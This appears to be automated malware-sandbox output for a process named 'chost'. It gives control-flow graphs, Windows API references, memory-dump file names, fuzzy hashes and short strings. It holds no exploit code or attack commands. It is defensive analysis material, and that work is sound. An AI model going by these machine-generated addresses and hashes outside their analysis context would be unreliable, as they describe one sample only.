7ff6943860e0 1362->1370 1367 7ff69438616b-7ff69438616e 1363->1367 1423 7ff694385db6-7ff694385dba 1364->1423 1378 7ff694386034-7ff69438605e call 7ff6943855f0 call 7ff6943855e0 call 7ff6943855e8 1365->1378 1379 7ff694385f72-7ff694385f93 1365->1379 1374 7ff694386174-7ff69438617c call 7ff694385c70 1367->1374 1375 7ff6943860e3 1367->1375 1388 7ff69438612a 1369->1388 1389 7ff694386133-7ff69438614e call 7ff6943815e8 1369->1389 1370->1375 1376 7ff6943860e8-7ff694386114 call 7ff69437a9b8 call 7ff69436c5c0 1374->1376 1375->1376 1377 7ff6943860e3 call 7ff694385eec 1375->1377 1377->1376 1383 7ff694385f95-7ff694385f9b 1379->1383 1384 7ff694385f9e-7ff694385fa5 1379->1384 1383->1384 1391 7ff694385fb9 1384->1391 1392 7ff694385fa7-7ff694385faf 1384->1392 1396 7ff69438612c-7ff694386131 call 7ff69437a9b8 1388->1396 1405 7ff694386155-7ff694386167 call 7ff69437a9b8 1389->1405 1406 7ff694386150-7ff694386153 1389->1406 1402 7ff694385fbb-7ff69438602f call 7ff69438a540 * 4 call 7ff694382bcc call 7ff694386184 * 2 1391->1402 1392->1391 1398 7ff694385fb1-7ff694385fb7 1392->1398 1396->1370 1398->1402 1402->1378 1405->1367 1406->1396 1424 7ff694385dbc 1423->1424 1425 7ff694385dc0-7ff694385dc4 1423->1425 1424->1425 1425->1423 1427 7ff694385dc6-7ff694385deb call 7ff694376bc8 1425->1427 1434 7ff694385dee-7ff694385df2 1427->1434 1436 7ff694385df4-7ff694385dff 1434->1436 1437 7ff694385e01-7ff694385e05 1434->1437 1436->1437 1439 7ff694385e07-7ff694385e0b 1436->1439 1437->1434 1441 7ff694385e0d-7ff694385e35 call 7ff694376bc8 1439->1441 1442 7ff694385e8c-7ff694385e90 1439->1442 1450 7ff694385e37 1441->1450 1451 7ff694385e53-7ff694385e57 1441->1451 1443 7ff694385e97-7ff694385ea4 1442->1443 1444 7ff694385e92-7ff694385e94 1442->1444 1446 7ff694385ea6-7ff694385ebc call 7ff694385b8c 1443->1446 1447 7ff694385ebf-7ff694385ece call 7ff6943855f0 call 7ff6943855e0 1443->1447 1444->1443 1446->1447 1447->1317 1455 7ff694385e3a-7ff694385e41 1450->1455 1451->1442 1453 7ff694385e59-7ff694385e77 call 7ff694376bc8 1451->1453 1462 7ff694385e83-7ff694385e8a 1453->1462 1455->1451 1458 7ff694385e43-7ff694385e51 1455->1458 1458->1451 1458->1455 1462->1442 1463 7ff694385e79-7ff694385e7d 1462->1463 1463->1442 1464 7ff694385e7f 1463->1464 1464->1462
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF694385CB5
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694385608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69438561C
                                                                                                                                                                                                                                          • Part of subcall function 00007FF69437A9B8: HeapFree.KERNEL32(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9CE
                                                                                                                                                                                                                                          • Part of subcall function 00007FF69437A9B8: GetLastError.KERNEL32(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9D8
                                                                                                                                                                                                                                          • Part of subcall function 00007FF69437A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF69437A94F,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437A979
                                                                                                                                                                                                                                          • Part of subcall function 00007FF69437A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF69437A94F,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437A99E
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF694385CA4
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694385668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69438567C
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF694385F1A
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF694385F2B
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF694385F3C
                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69438617C), ref: 00007FF694385F63
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                        • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                        • Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
                                                                                                                                                                                                                                        • Instruction ID: 165b0f244d4f5d43ebf412c6ee025a54cbd7c9b00b4b973127669f67b7f806e3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3FD19D62A1824286EB34AF37D8D11B9A7A1EF84794F44C17DEA4DC7B96DE3CE441C740

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1585 7ff6943869d4-7ff694386a47 call 7ff694386708 1588 7ff694386a49-7ff694386a52 call 7ff694374f58 1585->1588 1589 7ff694386a61-7ff694386a6b call 7ff694378590 1585->1589 1594 7ff694386a55-7ff694386a5c call 7ff694374f78 1588->1594 1595 7ff694386a6d-7ff694386a84 call 7ff694374f58 call 7ff694374f78 1589->1595 1596 7ff694386a86-7ff694386aef CreateFileW 1589->1596 1609 7ff694386da2-7ff694386dc2 1594->1609 1595->1594 1597 7ff694386b6c-7ff694386b77 GetFileType 1596->1597 1598 7ff694386af1-7ff694386af7 1596->1598 1604 7ff694386bca-7ff694386bd1 1597->1604 1605 7ff694386b79-7ff694386bb4 GetLastError call 7ff694374eec CloseHandle 1597->1605 1601 7ff694386b39-7ff694386b67 GetLastError call 7ff694374eec 1598->1601 1602 7ff694386af9-7ff694386afd 1598->1602 1601->1594 1602->1601 1607 7ff694386aff-7ff694386b37 CreateFileW 1602->1607 1612 7ff694386bd9-7ff694386bdc 1604->1612 1613 7ff694386bd3-7ff694386bd7 1604->1613 1605->1594 1620 7ff694386bba-7ff694386bc5 call 7ff694374f78 1605->1620 1607->1597 1607->1601 1614 7ff694386be2-7ff694386c37 call 7ff6943784a8 1612->1614 1615 7ff694386bde 1612->1615 1613->1614 1623 7ff694386c39-7ff694386c45 call 7ff694386910 1614->1623 1624 7ff694386c56-7ff694386c87 call 7ff694386488 1614->1624 1615->1614 1620->1594 1623->1624 1630 7ff694386c47 1623->1630 1631 7ff694386c8d-7ff694386ccf 1624->1631 1632 7ff694386c89-7ff694386c8b 1624->1632 1633 7ff694386c49-7ff694386c51 call 7ff69437ab30 1630->1633 1634 7ff694386cf1-7ff694386cfc 1631->1634 1635 7ff694386cd1-7ff694386cd5 1631->1635 1632->1633 1633->1609 1637 7ff694386d02-7ff694386d06 1634->1637 1638 7ff694386da0 1634->1638 1635->1634 1636 7ff694386cd7-7ff694386cec 1635->1636 1636->1634 1637->1638 1640 7ff694386d0c-7ff694386d51 CloseHandle CreateFileW 1637->1640 1638->1609 1642 7ff694386d86-7ff694386d9b 1640->1642 1643 7ff694386d53-7ff694386d81 GetLastError call 7ff694374eec call 7ff6943786d0 1640->1643 1642->1638 1643->1642
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1617910340-0
                                                                                                                                                                                                                                        • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                        • Instruction ID: 163e34ad10565bb3fe615f7e3a34a4ef17550527bb3377863564f117c90b8a52
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80C1A236B28A4285EB20CFB6C4906AC7771F749BA8B119269DE2ED77D4CF38E455C300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF694385F1A
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694385668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69438567C
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF694385F2B
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694385608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69438561C
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF694385F3C
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694385638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69438564C
                                                                                                                                                                                                                                          • Part of subcall function 00007FF69437A9B8: HeapFree.KERNEL32(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9CE
                                                                                                                                                                                                                                          • Part of subcall function 00007FF69437A9B8: GetLastError.KERNEL32(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9D8
                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69438617C), ref: 00007FF694385F63
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                        • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                        • Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
                                                                                                                                                                                                                                        • Instruction ID: 68bdfe0ab7c59c4bbe90852045afc8a49bb41bb64af145c24a555ec5f711f204
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF513962A1864286E734EF33D8C15A9A661EB48794F44D17DEA4DC7B96DF3CE440CB40
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382582292.00007FFDF7019000.00000080.00000001.01000000.0000001A.sdmp, Offset: 00007FFDF6B10000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379308973.00007FFDF6B10000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379354062.00007FFDF6B11000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379354062.00007FFDF6B22000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379354062.00007FFDF6B32000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379354062.00007FFDF6B38000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379354062.00007FFDF6B82000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379354062.00007FFDF6B97000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379354062.00007FFDF6BA7000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379354062.00007FFDF6BAE000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379354062.00007FFDF6BBC000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379354062.00007FFDF6D9E000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379354062.00007FFDF6E89000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379354062.00007FFDF6E8B000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379354062.00007FFDF6EC2000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379354062.00007FFDF6EFF000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379354062.00007FFDF6F5A000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379354062.00007FFDF6FCB000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379354062.00007FFDF7000000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379354062.00007FFDF7013000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382640671.00007FFDF701A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6b10000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                        • String ID: )tP
                                                                                                                                                                                                                                        • API String ID: 3300690313-3907340667
                                                                                                                                                                                                                                        • Opcode ID: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
                                                                                                                                                                                                                                        • Instruction ID: 1fcad8f72d3a4d3330ea4055f5d732149817959530bd12d98c84b69aff9eccd9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 816237267281D296E715CF38D4106BD76A0FB48789F045532EAAEC37CCEABCEA44D700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007E142010
                                                                                                                                                                                                                                        • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                                                                                        • API String ID: 2636501453-1046679716
                                                                                                                                                                                                                                        • Opcode ID: d7ead36279c90daa057756ddfad70f15206fe592525cea6a1f02fdb4d24458d3
                                                                                                                                                                                                                                        • Instruction ID: 8ded6de232fba4913d7c83f284910066c9fc6355e6298257ba3e2bd49a80da77
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7ead36279c90daa057756ddfad70f15206fe592525cea6a1f02fdb4d24458d3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8F1622AB0878186EB248B25D424BFA6BB1FF85B48F084135EE6D877D9DF7CE4459700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007E142010
                                                                                                                                                                                                                                        • String ID: :memory:
                                                                                                                                                                                                                                        • API String ID: 2636501453-2920599690
                                                                                                                                                                                                                                        • Opcode ID: 994fae84a6960ca7360fad19935dedf210197b0f4901e298583c4b1942b2d421
                                                                                                                                                                                                                                        • Instruction ID: 4c68753bb09e594973df98adf2ac3a5bd9facb65b6f855e237227601786888b2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 994fae84a6960ca7360fad19935dedf210197b0f4901e298583c4b1942b2d421
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62427E6AF0978386EB648B25A560BB927B0FF84B84F045135DE6D877D8DF3CE4969300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                                                                                                        • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                        • Instruction ID: 2e410cf13851aeba81fe7b4c3396e602905b6641dc6c9ffad5377d03b7e6117a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6DF04432A1864286F7708F76B4D976A7350EB84764F148279DAAD866D4EF3CD059CB00
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                                                                                                                        • Opcode ID: 7e95180d38cd00ed8df76aa16efa4cdac9e9adb77db5b2022ed37012a1f49ff9
                                                                                                                                                                                                                                        • Instruction ID: e80d1d1e1dd91ecebb70afb7b8c581330908d6b081f27305a6469fd2d4e4eb92
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e95180d38cd00ed8df76aa16efa4cdac9e9adb77db5b2022ed37012a1f49ff9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72A1192AF0AB0785FF588B59B871BB422A1BF54B44F441535C92E877E8DF6CE4A89340

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 633 7ff694361950-7ff69436198b call 7ff6943645b0 636 7ff694361c4e-7ff694361c72 call 7ff69436c5c0 633->636 637 7ff694361991-7ff6943619d1 call 7ff694367f80 633->637 642 7ff694361c3b-7ff694361c3e call 7ff6943700bc 637->642 643 7ff6943619d7-7ff6943619e7 call 7ff694370744 637->643 647 7ff694361c43-7ff694361c4b 642->647 648 7ff6943619e9-7ff694361a03 call 7ff694374f78 call 7ff694362910 643->648 649 7ff694361a08-7ff694361a24 call 7ff69437040c 643->649 647->636 648->642 655 7ff694361a26-7ff694361a40 call 7ff694374f78 call 7ff694362910 649->655 656 7ff694361a45-7ff694361a5a call 7ff694374f98 649->656 655->642 662 7ff694361a7b-7ff694361afc call 7ff694361c80 * 2 call 7ff694370744 656->662 663 7ff694361a5c-7ff694361a76 call 7ff694374f78 call 7ff694362910 656->663 675 7ff694361b01-7ff694361b14 call 7ff694374fb4 662->675 663->642 678 7ff694361b16-7ff694361b30 call 7ff694374f78 call 7ff694362910 675->678 679 7ff694361b35-7ff694361b4e call 7ff69437040c 675->679 678->642 685 7ff694361b6f-7ff694361b8b call 7ff694370180 679->685 686 7ff694361b50-7ff694361b6a call 7ff694374f78 call 7ff694362910 679->686 692 7ff694361b8d-7ff694361b99 call 7ff694362710 685->692 693 7ff694361b9e-7ff694361bac 685->693 686->642 692->642 693->642 696 7ff694361bb2-7ff694361bb9 693->696 699 7ff694361bc1-7ff694361bc7 696->699 700 7ff694361bc9-7ff694361bd6 699->700 701 7ff694361be0-7ff694361bef 699->701 702 7ff694361bf1-7ff694361bfa 700->702 701->701 701->702 703 7ff694361bfc-7ff694361bff 702->703 704 7ff694361c0f 702->704 703->704 705 7ff694361c01-7ff694361c04 703->705 706 7ff694361c11-7ff694361c24 704->706 705->704 709 7ff694361c06-7ff694361c09 705->709 707 7ff694361c2d-7ff694361c39 706->707 708 7ff694361c26 706->708 707->642 707->699 708->707 709->704 710 7ff694361c0b-7ff694361c0d 709->710 710->706
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694367F80: _fread_nolock.LIBCMT ref: 00007FF69436802A
                                                                                                                                                                                                                                        • _fread_nolock.LIBCMT ref: 00007FF694361A1B
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694362910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF694361B6A), ref: 00007FF69436295E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
